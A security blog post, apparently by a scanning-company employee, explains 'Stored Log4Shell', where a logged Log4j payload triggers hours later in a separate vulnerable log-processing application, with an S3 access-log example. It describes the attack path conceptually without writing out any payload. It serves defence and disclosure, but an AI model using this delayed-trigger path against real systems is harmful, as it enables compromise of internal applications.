What is Stored Log4Shell?

Note: I initially posted this article on Data Theorem’s blog.

What is “Stored Log4Shell” and how is it different than the regular Log4Shell issue?

The following diagram describes how Data Theorem, the company where I work, detects APIs and servers vulnerable to Log4Shell:

During our analysis, we noticed the Log4j callback connection can take from a few seconds, which is the norm, to several hours for the LDAP request to be sent to our exploit server (step 2 in the diagram). This LDAP request is what indicates that an application is vulnerable to Log4Shell, but why would it take so long for the exploit to be run?

We investigated and uncovered the following scenario:

A web application receiving our Log4Shell payload is not vulnerable: it does log the payload (for example as part of the User-Agent header) to a file, but it doesn’t use a vulnerable version of the Log4j library to do so. Hence, the exploit is not triggered at that time.
Later, a second, separate application processes the log files generated by the initial web application. This second application uses a vulnerable version of the Log4j library and logs some data extracted from the initial application’s logs. This is when the exploit gets triggered, and this explains why it would happen hours after sending it.

We’ve dubbed this a “stored” Log4Shell issue: the payload gets stored to a file, and, at a later stage, it reaches a vulnerable application which then gets exploited.

We’ve seen an example of this with S3 buckets that have S3 Access or CloudTrail enabled for logging HTTP requests sent to the bucket:

In one of the environments we scanned, a Java application was configured to process a bucket’s access logs every few hours.
This Java application was using a vulnerable version of the Log4j library, and was logging specific content extracted from the bucket’s logs, thereby triggering the exploit.

This increases the impact of Log4Shell, because applications that are not directly accessible to an attacker, from the Internet, can still get compromised via a “stored” Log4Shell. It also makes it difficult to identify which specific application is vulnerable, among all the applications that might process your web logs. In this situation, the IP address that opened the connection to the LDAP server can help pinpoint the application.